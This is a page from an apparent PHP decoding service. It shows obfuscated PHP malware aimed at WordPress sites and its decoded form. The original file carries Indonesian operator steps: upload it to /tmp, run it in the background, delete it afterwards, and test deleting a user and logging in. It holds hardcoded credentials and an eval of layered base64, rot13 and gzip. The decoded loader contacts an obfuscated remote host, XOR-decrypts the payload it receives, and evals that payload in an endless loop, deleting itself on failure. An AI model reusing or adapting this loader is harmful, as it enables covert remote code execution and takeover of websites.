Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php //1. pastikan current_dir nya sesuai dengan letak wp-config.php //2. cd /tmp -> pi..

Decoded Output download


error_reporting(0);
if(count($argv) != 2){
    unlink(__FILE__);die("use licence!!!
");
}
$secret = $argv[1];

//1. check the file is exist or not
$template = array(".xyz","liar","kucing", "http", "s://", "/zero");
$data = http($template[3].$template[4].$template[2].$template[1].$template[0].$template[5]."/?load=wp&secret=$secret");
//2. load file
if(strlen($data) > 0){
    if(preg_match('#invalid#', $data)){
        unlink(__FILE__);die("invalid key . . . .");
    }
    $data = xor_this(base64_decode($data), $secret);
    $data = str_replace("{{CURRENT_DIR}}", $current_dir, $data);
    $data = str_replace("{{USERNAME}}", $username, $data);
    $data = str_replace("{{PASSWORD}}", $password, $data);
    $data = str_replace("{{SECRET}}", $secret, $data);
    while(1){
        $data = str_replace('<?php', '', $data);
        eval($data);
        sleep(1);
    }
}
unlink(__FILE__);die("Not connected");

function xor_this($string, $key) {
    $text = $string;
    $outText = '';
    for($i=0; $i<strlen($text); )
    {
        for($j=0; ($j<strlen($key) && $i<strlen($text)); $j++,$i++)
        {
            $outText .= $text[$i] ^ $key[$j];
        }
    }
    return $outText;
}

function http($url){
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, '30');
    curl_setopt($ch, CURLINFO_HEADER_OUT, true);
    $res = curl_exec($ch);
    curl_close($ch);
    return $res; 
}

Did this file decode correctly?

Original Code

<?php
//1. pastikan current_dir nya sesuai dengan letak wp-config.php
//2. cd /tmp -> pindah ke folder /tmp
//3. upload file tsb.
//4. execute  : php test.php 2096023362 &
//5. jika loading, maka berhasil, coba akses shell lagi, file run secara background.
//6. jangan lupa file nya di hapus
//7. kita test delete user tadi.
//8. test login

$username = "kucing";
$password = "testing123";
$current_dir = "/home/brebesbx/a.b-dc.my.id/wp/";
$data = 'jUfvYtowEP2ev8KkRJMIUaDt9m6USDAF0D6gNtWQTcYiJ2WcljZmjsYlrfjfas4PoFvXNlVLtu/dvXv3Eg0YC5jPIAwYl/TB6tg9Wq4sEcSUW1PCHmF50uiTI/tMI/jENJdnevn+5ezK8327l1ew9DgCklgBR0Cj0fhWaFmy0YwIBANB+qTIM+8ubZrmON02ERmINeEZkJXMgciIwEVTnASM0IB4BoenMEI4IDRuLLmz9Pby7l5i6blZGC7rSyBKvVL0jPNDrdEXx0SrZg8sQ+WNNOEJ4kiAtVo4P160apuT/c3R/qa7v+nsYj4t2rpmlgdW2r8ND8sO+0inqq7jHLWJui5NRkVTnOVArYKQWr6SQSUlXoUMHvynhIvMMg8kvVZlmR6YLUXGSWT/l71PkDXckWn5RhQUYEb81yIsZMQ8k5H1O4ng84mfgghFqChuuZJ+Ba1OyFv5IkIElm1+Pp+4rjcY+xczarNOqQ0RMwaU+6lxNeM3E1lTnjuYXnslGi3DdfIEH4J+m45T34fuUgkNkyi6DUv6IejIO2q9ZAks23wJu81jWUlqQuvXEpmndG4W4nFZ8yVcPYBGsP4+jGWAEPPW49h1r89jEGMiAldOY1XV9LRIWQWXAd1azUAq6GqsjJO2VlYVLbks3q3yshIhiPm4PDfN8nUVMMuQ/UGPGPK09qLC2j1vFxG71ovYVBWLyza4KG1r+A8eExiPzXPLkM2mvc2xy/aCQ7tfMp4bZU5+FZ3MjcfFQbDNnmJkVzGjW7D6mOxxKd/omOXVzAyRbrvoxtyXR2Wrkrw4iIAHIX7HUdYideCr4bexj4vyH+LfCVHfWdzB2J0OU5ee2yLd9wDj2bU3nIzRJccd863g2eBl6P/wphee6xcAzm+ofcwgqvuBJQiF2s8l8iCCvcNNK4T1iLb5Aw==';
eval(str_rot13(gzinflate(str_rot13(base64_decode(($data))))));

Function Calls

gzinflate 1
str_rot13 2
base64_decode 1

Variables

$data jUfvYtowEP2ev8KkRJMIUaDt9m6USDAF0D6gNtWQTcYiJ2WcljZmjsYlrfjf..
$password testing123
$username kucing
$current_dir /home/brebesbx/a.b-dc.my.id/wp/

Stats

MD5 37abfbb913c4dc1d269c539c2a5ea3dc
Eval Count 1
Decode Time 41 ms